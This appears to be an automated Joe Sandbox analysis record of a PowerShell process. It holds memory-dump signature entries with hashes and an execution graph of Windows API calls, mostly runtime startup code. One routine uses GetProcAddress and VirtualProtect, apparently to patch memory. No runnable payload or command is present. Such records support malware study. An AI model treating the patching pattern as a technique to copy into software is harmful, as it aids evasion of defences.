                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl
                                                  • API String ID: 0-3265925126
                                                  • Opcode ID: b6f6931706e2d00165d17730e0583657992ba4d990c23869dddc8233487de2a1
                                                  • Instruction ID: 5ddf0e9b6d21f3bff9e8f2dff7d755ba2a8a064cfef3b2fc3b4c15872ec8186c
                                                  • Opcode Fuzzy Hash: b6f6931706e2d00165d17730e0583657992ba4d990c23869dddc8233487de2a1
                                                  • Instruction Fuzzy Hash: 19E14EB5A00205DFC724CF68C551EAAFBB2AF89314F24C569D8269B754CB32EC45CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84El$84El$tP^q$tP^q
                                                  • API String ID: 0-3028291776
                                                  • Opcode ID: 7dc5439338b3c74214ce74ffe9acfb1ffa272106ca432d98f00e98aa5b2900ca
                                                  • Instruction ID: 4aba06fdb0a0414158fa20dd7bbedb9402bf79293832020466e1d10fc5fd9574
                                                  • Opcode Fuzzy Hash: 7dc5439338b3c74214ce74ffe9acfb1ffa272106ca432d98f00e98aa5b2900ca
                                                  • Instruction Fuzzy Hash: 739148B1B002069FC7189E79C854A7AFBE6BFC5710F18886AE845DF391DA31EC45C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fGl$(fGl$(fGl$(fGl
                                                  • API String ID: 0-3265925126
                                                  • Opcode ID: 78588d165e050c8b87a8f95f69cfcfeffa4df8eacc66386f3a24ec58df070121
                                                  • Instruction ID: bf42d84101fab78f4126319ce4fc7cc22e3c8764ccdf92ee194896459aa3276a
                                                  • Opcode Fuzzy Hash: 78588d165e050c8b87a8f95f69cfcfeffa4df8eacc66386f3a24ec58df070121
                                                  • Instruction Fuzzy Hash: 0A7181B4A01205DFDB24CF98D545EAAFBB2AF89310F248069D806AB314DB31EC51CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$84El$tP^q$$^q
                                                  • API String ID: 0-4226759889
                                                  • Opcode ID: 872be847ebdbde5c129d53aeed48b809ef42a7c638e320105b8f6b43d7214965
                                                  • Instruction ID: 642f87d843a8954d02ea5a80c7e1ff2e242d6561f885a8e5e6f9068c8669a7ea
                                                  • Opcode Fuzzy Hash: 872be847ebdbde5c129d53aeed48b809ef42a7c638e320105b8f6b43d7214965
                                                  • Instruction Fuzzy Hash: 3841C5B0B0020AEFDB24CF54C945BAAF7B2BB46711F64C456E9626F294C731ED41CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 9e6480277eded80fbaa4f7b72a8eccb095a355dbf187b21f200bdc676d2447f2
                                                  • Instruction ID: 4af00c68be2af0b05bb55ae46bf8674176eb630134a22d262d449963c1aa3e17
                                                  • Opcode Fuzzy Hash: 9e6480277eded80fbaa4f7b72a8eccb095a355dbf187b21f200bdc676d2447f2
                                                  • Instruction Fuzzy Hash: 4A2144B13103066BDB3859BA9820F27EA9ADBC1710F24843AE589CB385ED77EC40C360
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 9c334263dc36cd4c6d76f7090337cffefc668eba47cca27a19857b472a5bb874
                                                  • Instruction ID: 4a203e2903b25ecc289c1403b793e25aa6ae65c60745b65035360f313c6b903c
                                                  • Opcode Fuzzy Hash: 9c334263dc36cd4c6d76f7090337cffefc668eba47cca27a19857b472a5bb874
                                                  • Instruction Fuzzy Hash: 5021F4B1A043478FDB358E6496406B6FFF1AFC1210F1AD1AAD8458B242D735CD8ACB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2239573932.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7dd0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                  • API String ID: 0-2049395529
                                                  • Opcode ID: a18808030bbfdf9761a1854d732af49430efdb39f2e095da6f3a9a7f90de3f70
                                                  • Instruction ID: f4c952df7b2cb93c30bb6f3ea7141fef2af3326894d535fadf780c4e9cc77b29
                                                  • Opcode Fuzzy Hash: a18808030bbfdf9761a1854d732af49430efdb39f2e095da6f3a9a7f90de3f70
                                                  • Instruction Fuzzy Hash: 0E01626170D3D64FC32B56682824956AFB65FC3910B2A45EBC081CF36BCD558C4AC3B7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:2.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:1.3%
                                                  Total number of Nodes:1660
                                                  Total number of Limit Nodes:5
                                                  execution_graph 7241 22163c90 RtlUnwind 6036 2216281c 6039 22162882 6036->6039 6042 22163550 6039->6042 6041 2216282a 6043 2216355d 6042->6043 6047 2216358a 6042->6047 6044 221647e5 ___std_exception_copy 21 API calls 6043->6044 6043->6047 6045 2216357a 6044->6045 6045->6047 6048 2216544d 6045->6048 6047->6041 6049 2216545a 6048->6049 6050 22165468 6048->6050 6049->6050 6055 2216547f 6049->6055 6051 22166368 __dosmaperr 20 API calls 6050->6051 6052 22165470 6051->6052 6057 221662ac 6052->6057 6054 2216547a 6054->6047 6055->6054 6056 22166368 __dosmaperr 20 API calls 6055->6056 6056->6052 6060 22166231 6057->6060 6059 221662b8 6059->6054 6061 22165b7a _abort 20 API calls 6060->6061 6062 22166247 6061->6062 6063 221662a6 6062->6063 6067 22166255 6062->6067 6071 221662bc IsProcessorFeaturePresent 6063->6071 6065 221662ab 6066 22166231 _abort 26 API calls 6065->6066 6068 221662b8 6066->6068 6069 22162ada _ValidateLocalCookies 5 API calls 6067->6069 6068->6059 6070 2216627c 6069->6070 6070->6059 6072 221662c7 6071->6072 6075 221660e2 6072->6075 6076 221660fe ___scrt_fastfail 6075->6076 6077 2216612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6076->6077 6078 221661fb ___scrt_fastfail 6077->6078 6079 22162ada _ValidateLocalCookies 5 API calls 6078->6079 6080 22166219 GetCurrentProcess TerminateProcess 6079->6080 6080->6065 7242 22164a9a 7245 22165411 7242->7245 7246 2216541d _abort 7245->7246 7247 22165af6 _abort 38 API calls 7246->7247 7250 22165422 7247->7250 7248 221655a8 _abort 38 API calls 7249 2216544c 7248->7249 7250->7248 7251 2216679a 7252 221667a4 7251->7252 7253 221667b4 7252->7253 7254 2216571e _free 20 API calls 7252->7254 7255 2216571e _free 20 API calls 7253->7255 7254->7252 7256 221667bb 7255->7256 6081 22162418 6082 22162420 ___scrt_release_startup_lock 6081->6082 6085 221647f5 6082->6085 6084 22162448 6086 22164804 6085->6086 6087 22164808 6085->6087 6086->6084 6090 22164815 6087->6090 6091 22165b7a _abort 20 API calls 6090->6091 6094 2216482c 6091->6094 6092 22162ada _ValidateLocalCookies 5 API calls 6093 22164811 6092->6093 6093->6084 6094->6092 6095 22165303 6098 221650a5 6095->6098 6107 2216502f 6098->6107 6101 2216502f 5 API calls 6102 221650c3 6101->6102 6111 22165000 6102->6111 6105 22165000 20 API calls 6106 221650d9 6105->6106 6108 22165048 6107->6108 6109 22162ada _ValidateLocalCookies 5 API calls 6108->6109 6110 22165069 6109->6110 6110->6101 6112 2216500d 6111->6112 6116 2216502a 6111->6116 6113 22165024 6112->6113 6114 2216571e _free 20 API calls 6112->6114 6115 2216571e _free 20 API calls 6113->6115 6114->6112 6115->6116 6116->6105 6117 22167103 GetCommandLineA GetCommandLineW 7257 22167a80 7258 22167a8d 7257->7258 7259 2216637b _abort 20 API calls 7258->7259 7260 22167aa7 7259->7260 7261 2216571e _free 20 API calls 7260->7261 7262 22167ab3 7261->7262 7263 2216637b _abort 20 API calls 7262->7263 7267 22167ad9 7262->7267 7264 22167acd 7263->7264 7266 2216571e _free 20 API calls 7264->7266 7265 22165eb7 11 API calls 7265->7267 7266->7267 7267->7265 7268 22167ae5 7267->7268 6118 2216220c 6119 22162215 6118->6119 6120 2216221a dllmain_dispatch 6118->6120 6122 221622b1 6119->6122 6123 221622c7 6122->6123 6125 221622d0 6123->6125 6126 22162264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6123->6126 6125->6120 6126->6125 7273 22168a89 7276 22166d60 7273->7276 7277 22166d69 7276->7277 7279 22166d72 7276->7279 7280 22166c5f 7277->7280 7281 22165af6 _abort 38 API calls 7280->7281 7282 22166c6c 7281->7282 7283 22166d7e __fassign 38 API calls 7282->7283 7284 22166c74 7283->7284 7300 221669f3 7284->7300 7287 22166c8b 7287->7279 7290 22166cce 7292 2216571e _free 20 API calls 7290->7292 7292->7287 7294 22166cc9 7295 22166368 __dosmaperr 20 API calls 7294->7295 7295->7290 7296 22166d12 7296->7290 7324 221668c9 7296->7324 7297 22166ce6 7297->7296 7298 2216571e _free 20 API calls 7297->7298 7298->7296 7301 221654a7 __fassign 38 API calls 7300->7301 7302 22166a05 7301->7302 7303 22166a26 7302->7303 7304 22166a14 GetOEMCP 7302->7304 7305 22166a3d 7303->7305 7306 22166a2b GetACP 7303->7306 7304->7305 7305->7287 7307 221656d0 7305->7307 7306->7305 7308 2216570e 7307->7308 7313 221656de _abort 7307->7313 7309 22166368 __dosmaperr 20 API calls 7308->7309 7311 2216570c 7309->7311 7310 221656f9 RtlAllocateHeap 7310->7311 7310->7313 7311->7290 7314 22166e20 7311->7314 7312 2216474f _abort 7 API calls 7312->7313 7313->7308 7313->7310 7313->7312 7315 221669f3 40 API calls 7314->7315 7316 22166e3f 7315->7316 7317 22166e46 7316->7317 7320 22166e90 IsValidCodePage 7316->7320 7321 22166eb5 ___scrt_fastfail 7316->7321 7318 22162ada _ValidateLocalCookies 5 API calls 7317->7318 7319 22166cc1 7318->7319 7319->7294 7319->7297 7320->7317 7322 22166ea2 GetCPInfo 7320->7322 7327 22166acb GetCPInfo 7321->7327 7322->7317 7322->7321 7400 22166886 7324->7400 7326 221668ed 7326->7290 7332 22166b05 7327->7332 7336 22166baf 7327->7336 7329 22162ada _ValidateLocalCookies 5 API calls 7331 22166c5b 7329->7331 7331->7317 7337 221686e4 7332->7337 7335 22168a3e 43 API calls 7335->7336 7336->7329 7338 221654a7 __fassign 38 API calls 7337->7338 7339 22168704 MultiByteToWideChar 7338->7339 7341 22168742 7339->7341 7342 221687da 7339->7342 7345 221656d0 21 API calls 7341->7345 7347 22168763 ___scrt_fastfail 7341->7347 7343 22162ada _ValidateLocalCookies 5 API calls 7342->7343 7346 22166b66 7343->7346 7344 221687d4 7356 22168801 7344->7356 7345->7347 7351 22168a3e 7346->7351 7347->7344 7349 221687a8 MultiByteToWideChar 7347->7349 7349->7344 7350 221687c4 GetStringTypeW 7349->7350 7350->7344 7352 221654a7 __fassign 38 API calls 7351->7352 7353 22168a51 7352->7353 7360 22168821 7353->7360 7357 2216880d 7356->7357 7359 2216881e 7356->7359 7358 2216571e _free 20 API calls 7357->7358 7357->7359 7358->7359 7359->7342 7361 2216883c 7360->7361 7362 22168862 MultiByteToWideChar 7361->7362 7363 2216888c 7362->7363 7364 22168a16 7362->7364 7369 221656d0 21 API calls 7363->7369 7371 221688ad 7363->7371 7365 22162ada _ValidateLocalCookies 5 API calls 7364->7365 7366 22166b87 7365->7366 7366->7335 7367 221688f6 MultiByteToWideChar 7368 22168962 7367->7368 7370 2216890f 7367->7370 7373 22168801 __freea 20 API calls 7368->7373 7369->7371 7387 22165f19 7370->7387 7371->7367 7371->7368 7373->7364 7375 22168971 7377 221656d0 21 API calls 7375->7377 7381 22168992 7375->7381 7376 22168939 7376->7368 7378 22165f19 11 API calls 7376->7378 7377->7381 7378->7368 7379 22168a07 7380 22168801 __freea 20 API calls 7379->7380 7380->7368 7381->7379 7382 22165f19 11 API calls 7381->7382 7383 221689e6 7382->7383 7383->7379 7384 221689f5 WideCharToMultiByte 7383->7384 7384->7379 7385 22168a35 7384->7385 7386 22168801 __freea 20 API calls 7385->7386 7386->7368 7388 22165c45 _abort 5 API calls 7387->7388 7389 22165f40 7388->7389 7392 22165f49 7389->7392 7395 22165fa1 7389->7395 7393 22162ada _ValidateLocalCookies 5 API calls 7392->7393 7394 22165f9b 7393->7394 7394->7368 7394->7375 7394->7376 7396 22165c45 _abort 5 API calls 7395->7396 7397 22165fc8 7396->7397 7398 22162ada _ValidateLocalCookies 5 API calls 7397->7398 7399 22165f89 LCMapStringW 7398->7399 7399->7392 7401 22166892 ___scrt_is_nonwritable_in_current_image 7400->7401 7408 22165671 RtlEnterCriticalSection 7401->7408 7403 2216689c 7409 221668f1 7403->7409 7407 221668b5 _abort 7407->7326 7408->7403 7421 22167011 7409->7421 7411 2216693f 7412 22167011 26 API calls 7411->7412 7413 2216695b 7412->7413 7414 22167011 26 API calls 7413->7414 7415 22166979 7414->7415 7416 2216571e _free 20 API calls 7415->7416 7417 221668a9 7415->7417 7416->7417 7418 221668bd 7417->7418 7435 221656b9 RtlLeaveCriticalSection 7418->7435 7420 221668c7 7420->7407 7422 22167022 7421->7422 7426 2216701e 7421->7426 7423 22167029 7422->7423 7428 2216703c ___scrt_fastfail 7422->7428 7424 22166368 __dosmaperr 20 API calls 7423->7424 7425 2216702e 7424->7425 7427 221662ac _abort 26 API calls 7425->7427 7426->7411 7427->7426 7428->7426 7429 22167073 7428->7429 7430 2216706a 7428->7430 7429->7426 7433 22166368 __dosmaperr 20 API calls 7429->7433 7431 22166368 __dosmaperr 20 API calls 7430->7431 7432 2216706f 7431->7432 7434 221662ac _abort 26 API calls 7432->7434 7433->7432 7434->7426 7435->7420 7436 22163eb3 7437 22165411 38 API calls 7436->7437 7438 22163ebb 7437->7438 6127 22165630 6128 2216563b 6127->6128 6130 22165664 6128->6130 6131 22165660 6128->6131 6133 22165eb7 6128->6133 6140 22165688 6130->6140 6134 22165c45 _abort 5 API calls 6133->6134 6135 22165ede 6134->6135 6136 22165efc InitializeCriticalSectionAndSpinCount 6135->6136 6137 22165ee7 6135->6137 6136->6137 6138 22162ada _ValidateLocalCookies 5 API calls 6137->6138 6139 22165f13 6138->6139 6139->6128 6141 22165695 6140->6141 6143 221656b4 6140->6143 6142 2216569f RtlDeleteCriticalSection 6141->6142 6142->6142 6142->6143 6143->6131 6144 22161f3f 6145 22161f4b ___scrt_is_nonwritable_in_current_image 6144->6145 6162 2216247c 6145->6162 6147 22161f52 6148 22162041 6147->6148 6149 22161f7c 6147->6149 6156 22161f57 ___scrt_is_nonwritable_in_current_image 6147->6156 6189 22162639 IsProcessorFeaturePresent 6148->6189 6173 221623de 6149->6173 6152 22162048 6153 22161f8b __RTC_Initialize 6153->6156 6176 221622fc RtlInitializeSListHead 6153->6176 6155 22161f99 ___scrt_initialize_default_local_stdio_options 6177 221646c5 6155->6177 6160 22161fb8 6160->6156 6185 22164669 6160->6185 6163 22162485 6162->6163 6193 22162933 IsProcessorFeaturePresent 6163->6193 6167 22162496 6172 2216249a 6167->6172 6204 221653c8 6167->6204 6170 221624b1 6170->6147 6172->6147 6278 221624b5 6173->6278 6175 221623e5 6175->6153 6176->6155 6180 221646dc 6177->6180 6178 22162ada _ValidateLocalCookies 5 API calls 6179 22161fad 6178->6179 6179->6156 6181 221623b3 6179->6181 6180->6178 6182 221623b8 ___scrt_release_startup_lock 6181->6182 6183 22162933 ___isa_available_init IsProcessorFeaturePresent 6182->6183 6184 221623c1 6182->6184 6183->6184 6184->6160 6187 22164698 6185->6187 6186 22162ada _ValidateLocalCookies 5 API calls 6188 221646c1 6186->6188 6187->6186 6188->6156 6190 2216264e ___scrt_fastfail 6189->6190 6191 221626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6190->6191 6192 22162744 ___scrt_fastfail 6191->6192 6192->6152 6194 22162491 6193->6194 6195 221634ea 6194->6195 6196 221634ef ___vcrt_initialize_winapi_thunks 6195->6196 6215 22163936 6196->6215 6199 221634fd 6199->6167 6201 22163505 6202 22163510 6201->6202 6229 22163972 6201->6229 6202->6167 6270 22167457 6204->6270 6207 22163529 6208 22163532 6207->6208 6214 22163543 6207->6214 6209 2216391b ___vcrt_uninitialize_ptd 6 API calls 6208->6209 6210 22163537 6209->6210 6211 22163972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6210->6211 6212 2216353c 6211->6212 6274 22163c50 6212->6274 6214->6172 6216 2216393f 6215->6216 6218 22163968 6216->6218 6219 221634f9 6216->6219 6233 22163be0 6216->6233 6220 22163972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6218->6220 6219->6199 6221 221638e8 6219->6221 6220->6219 6251 22163af1 6221->6251 6224 221638fd 6224->6201 6227 22163918 6227->6201 6230 2216399c 6229->6230 6231 2216397d 6229->6231 6230->6199 6232 22163987 RtlDeleteCriticalSection 6231->6232 6232->6230 6232->6232 6238 22163a82 6233->6238 6235 22163bfa 6236 22163c18 InitializeCriticalSectionAndSpinCount 6235->6236 6237 22163c03 6235->6237 6236->6237 6237->6216 6239 22163aaa 6238->6239 6243 22163aa6 __crt_fast_encode_pointer 6238->6243 6239->6243 6244 221639be 6239->6244 6242 22163ac4 GetProcAddress 6242->6243 6243->6235 6249 221639cd try_get_first_available_module 6244->6249 6245 22163a77 6245->6242 6245->6243 6246 221639ea LoadLibraryExW 6247 22163a05 GetLastError 6246->6247 6246->6249 6247->6249 6248 22163a60 FreeLibrary 6248->6249 6249->6245 6249->6246 6249->6248 6250 22163a38 LoadLibraryExW 6249->6250 6250->6249 6252 22163a82 try_get_function 5 API calls 6251->6252 6253 22163b0b 6252->6253 6254 22163b24 TlsAlloc 6253->6254 6255 221638f2 6253->6255 6255->6224 6256 22163ba2 6255->6256 6257 22163a82 try_get_function 5 API calls 6256->6257 6258 22163bbc 6257->6258 6259 22163bd7 TlsSetValue 6258->6259 6260 2216390b 6258->6260 6259->6260 6260->6227 6261 2216391b 6260->6261 6262 22163925 6261->6262 6263 2216392b 6261->6263 6265 22163b2c 6262->6265 6263->6224 6266 22163a82 try_get_function 5 API calls 6265->6266 6267 22163b46 6266->6267 6268 22163b5e TlsFree 6267->6268 6269 22163b52 6267->6269 6268->6269 6269->6263 6271 22167470 6270->6271 6272 22162ada _ValidateLocalCookies 5 API calls 6271->6272 6273 221624a3 6272->6273 6273->6170 6273->6207 6275 22163c7f 6274->6275 6276 22163c59 6274->6276 6275->6214 6276->6275 6277 22163c69 FreeLibrary 6276->6277 6277->6276 6279 221624c4 6278->6279 6280 221624c8 6278->6280 6279->6175 6281 22162639 ___scrt_fastfail 4 API calls 6280->6281 6283 221624d5 ___scrt_release_startup_lock 6280->6283 6282 22162559 6281->6282 6283->6175 6284 2216543d 6285 22165440 6284->6285 6288 221655a8 6285->6288 6299 22167613 6288->6299 6291 221655b8 6293 221655c2 IsProcessorFeaturePresent 6291->6293 6294 221655e0 6291->6294 6295 221655cd 6293->6295 6329 22164bc1 6294->6329 6297 221660e2 _abort 8 API calls 6295->6297 6297->6294 6332 22167581 6299->6332 6302 2216766e 6303 2216767a _abort 6302->6303 6304 22165b7a _abort 20 API calls 6303->6304 6307 221676a7 _abort 6303->6307 6310 221676a1 _abort 6303->6310 6304->6310 6305 221676f3 6306 22166368 __dosmaperr 20 API calls 6305->6306 6308 221676f8 6306->6308 6314 2216771f 6307->6314 6346 22165671 RtlEnterCriticalSection 6307->6346 6311 221662ac _abort 26 API calls 6308->6311 6310->6305 6310->6307 6328 221676d6 6310->6328 6311->6328 6316 2216777e 6314->6316 6318 22167776 6314->6318 6325 221677a9 6314->6325 6347 221656b9 RtlLeaveCriticalSection 6314->6347 6316->6325 6348 22167665 6316->6348 6319 22164bc1 _abort 28 API calls 6318->6319 6319->6316 6324 22167665 _abort 38 API calls 6324->6325 6351 2216782e 6325->6351 6326 2216780c 6327 22165af6 _abort 38 API calls 6326->6327 6326->6328 6327->6328 6375 2216bdc9 6328->6375 6379 2216499b 6329->6379 6335 22167527 6332->6335 6334 221655ad 6334->6291 6334->6302 6336 22167533 ___scrt_is_nonwritable_in_current_image 6335->6336 6341 22165671 RtlEnterCriticalSection 6336->6341 6338 22167541 6342 22167575 6338->6342 6340 22167568 _abort 6340->6334 6341->6338 6345 221656b9 RtlLeaveCriticalSection 6342->6345 6344 2216757f 6344->6340 6345->6344 6346->6314 6347->6318 6349 22165af6 _abort 38 API calls 6348->6349 6350 2216766a 6349->6350 6350->6324 6352 22167834 6351->6352 6353 221677fd 6351->6353 6378 221656b9 RtlLeaveCriticalSection 6352->6378 6353->6326 6353->6328 6355 22165af6 GetLastError 6353->6355 6356 22165b0c 6355->6356 6357 22165b12 6355->6357 6358 22165e08 _abort 11 API calls 6356->6358 6359 2216637b _abort 20 API calls 6357->6359 6361 22165b61 SetLastError 6357->6361 6358->6357 6360 22165b24 6359->6360 6362 22165e5e _abort 11 API calls 6360->6362 6366 22165b2c 6360->6366 6361->6326 6364 22165b41 6362->6364 6363 2216571e _free 20 API calls 6365 22165b32 6363->6365 6364->6366 6367 22165b48 6364->6367 6368 22165b6d SetLastError 6365->6368 6366->6363 6369 2216593c _abort 20 API calls 6367->6369 6370 221655a8 _abort 35 API calls 6368->6370 6371 22165b53 6369->6371 6372 22165b79 6370->6372 6373 2216571e _free 20 API calls 6371->6373 6374 22165b5a 6373->6374 6374->6361 6374->6368 6376 22162ada _ValidateLocalCookies 5 API calls 6375->6376 6377 2216bdd4 6376->6377 6377->6377 6378->6353 6380 221649a7 _abort 6379->6380 6388 221649bf 6380->6388 6401 22164af5 GetModuleHandleW 6380->6401 6384 22164a65 6414 22164aa5 6384->6414 6387 22164a3c 6390 22164a54 6387->6390 6396 22164669 _abort 5 API calls 6387->6396 6410 22165671 RtlEnterCriticalSection 6388->6410 6397 22164669 _abort 5 API calls 6390->6397 6391 22164a82 6417 22164ab4 6391->6417 6392 22164aae 6395 2216bdc9 _abort 5 API calls 6392->6395 6400 22164ab3 6395->6400 6396->6390 6397->6384 6398 221649c7 6398->6384 6398->6387 6411 2216527a 6398->6411 6402 221649b3 6401->6402 6402->6388 6403 22164b39 GetModuleHandleExW 6402->6403 6404 22164b63 GetProcAddress 6403->6404 6407 22164b78 6403->6407 6404->6407 6405 22164b95 6408 22162ada _ValidateLocalCookies 5 API calls 6405->6408 6406 22164b8c FreeLibrary 6406->6405 6407->6405 6407->6406 6409 22164b9f 6408->6409 6409->6388 6410->6398 6425 22165132 6411->6425 6447 221656b9 RtlLeaveCriticalSection 6414->6447 6416 22164a7e 6416->6391 6416->6392 6448 22166025 6417->6448 6420 22164ae2 6423 22164b39 _abort 8 API calls 6420->6423 6421 22164ac2 GetPEB 6421->6420 6422 22164ad2 GetCurrentProcess TerminateProcess 6421->6422 6422->6420 6424 22164aea ExitProcess 6423->6424 6428 221650e1 6425->6428 6427 22165156 6427->6387 6429 221650ed ___scrt_is_nonwritable_in_current_image 6428->6429 6436 22165671 RtlEnterCriticalSection 6429->6436 6431 221650fb 6437 2216515a 6431->6437 6435 22165119 _abort 6435->6427 6436->6431 6440 22165182 6437->6440 6441 2216517a 6437->6441 6438 22162ada _ValidateLocalCookies 5 API calls 6439 22165108 6438->6439 6443 22165126 6439->6443 6440->6441 6442 2216571e _free 20 API calls 6440->6442 6441->6438 6442->6441 6446 221656b9 RtlLeaveCriticalSection 6443->6446 6445 22165130 6445->6435 6446->6445 6447->6416 6449 22166040 6448->6449 6450 2216604a 6448->6450 6452 22162ada _ValidateLocalCookies 5 API calls 6449->6452 6451 22165c45 _abort 5 API calls 6450->6451 6451->6449 6453 22164abe 6452->6453 6453->6420 6453->6421 5778 2216c7a7 5779 2216c7be 5778->5779 5784 2216c82c 5778->5784 5779->5784 5790 2216c7e6 GetModuleHandleA 5779->5790 5780 2216c835 GetModuleHandleA 5785 2216c83f 5780->5785 5781 2216c872 5783 2216c7dd 5783->5784 5783->5785 5787 2216c800 GetProcAddress 5783->5787 5784->5780 5784->5781 5784->5785 5785->5784 5786 2216c85f GetProcAddress 5785->5786 5786->5784 5787->5784 5788 2216c80d VirtualProtect 5787->5788 5788->5784 5789 2216c81c VirtualProtect 5788->5789 5789->5784 5791 2216c7ef 5790->5791 5798 2216c82c 5790->5798 5802 2216c803 GetProcAddress 5791->5802 5793 2216c7f4 5796 2216c800 GetProcAddress 5793->5796 5793->5798 5794 2216c835 GetModuleHandleA 5800 2216c83f 5794->5800 5795 2216c872 5797 2216c80d VirtualProtect 5796->5797 5796->5798 5797->5798 5799 2216c81c VirtualProtect 5797->5799 5798->5794 5798->5795 5798->5800 5799->5798 5800->5798 5801 2216c85f GetProcAddress 5800->5801 5801->5798 5803 2216c82c 5802->5803 5804 2216c80d VirtualProtect 5802->5804 5806 2216c835 GetModuleHandleA 5803->5806 5807 2216c872 5803->5807 5804->5803 5805 2216c81c VirtualProtect 5804->5805 5805->5803 5809 2216c83f 5806->5809 5808 2216c85f GetProcAddress 5808->5809 5809->5803 5809->5808 7443 221621a1 ___scrt_dllmain_exception_filter 7444 221660ac 7445 221660dd 7444->7445 7447 221660b7 7444->7447 7446 221660c7 FreeLibrary 7446->7447 7447->7445 7447->7446 6454 2216742b 6455 22167430 6454->6455 6457 22167453 6455->6457 6458 22168bae 6455->6458 6459 22168bdd 6458->6459 6460 22168bbb 6458->6460 6459->6455 6461 22168bd7 6460->6461 6462 22168bc9 RtlDeleteCriticalSection 6460->6462 6463 2216571e _free 20 API calls 6461->6463 6462->6461 6462->6462 6463->6459 7448 22164ed7 7449 22166d60 51 API calls 7448->7449 7450 22164ee9 7449->7450 7459 22167153 GetEnvironmentStringsW 7450->7459 7454 2216571e _free 20 API calls 7455 22164f29 7454->7455 7456 22164eff 7457 2216571e _free 20 API calls 7456->7457 7458 22164ef4 7457->7458 7458->7454 7460 2216716a 7459->7460 7470 221671bd 7459->7470 7463 22167170 WideCharToMultiByte 7460->7463 7461 221671c6 FreeEnvironmentStringsW 7462 22164eee 7461->7462 7462->7458 7471 22164f2f 7462->7471 7464 2216718c 7463->7464 7463->7470 7465 221656d0 21 API calls 7464->7465 7466 22167192 7465->7466 7467 221671af 7466->7467 7468 22167199 WideCharToMultiByte 7466->7468 7469 2216571e _free 20 API calls 7467->7469 7468->7467 7469->7470 7470->7461 7470->7462 7472 22164f44 7471->7472 7473 2216637b _abort 20 API calls 7472->7473 7483 22164f6b 7473->7483 7474 22164fcf 7475 2216571e _free 20 API calls 7474->7475 7476 22164fe9 7475->7476 7476->7456 7477 2216637b _abort 20 API calls 7477->7483 7478 22164fd1 7480 22165000 20 API calls 7478->7480 7479 2216544d ___std_exception_copy 26 API calls 7479->7483 7481 22164fd7 7480->7481 7482 2216571e _free 20 API calls 7481->7482 7482->7474 7483->7474 7483->7477 7483->7478 7483->7479 7484 22164ff3 7483->7484 7486 2216571e _free 20 API calls 7483->7486 7485 221662bc _abort 11 API calls 7484->7485 7487 22164fff 7485->7487 7486->7483 7488 221666d5 7489 221666e1 7488->7489 7490 221666f2 7489->7490 7491 221666eb FindClose 7489->7491 7492 22162ada _ValidateLocalCookies 5 API calls 7490->7492 7491->7490 7493 22166701 7492->7493 7494 221673d5 7495 221673e1 ___scrt_is_nonwritable_in_current_image 7494->7495 7506 22165671 RtlEnterCriticalSection 7495->7506 7497 221673e8 7498 22168be3 27 API calls 7497->7498 7499 221673f7 7498->7499 7505 22167406 7499->7505 7507 22167269 GetStartupInfoW 7499->7507 7503 22167417 _abort 7518 22167422 7505->7518 7506->7497 7508 22167286 7507->7508 7509 22167318 7507->7509 7508->7509 7510 22168be3 27 API calls 7508->7510 7513 2216731f 7509->7513 7511 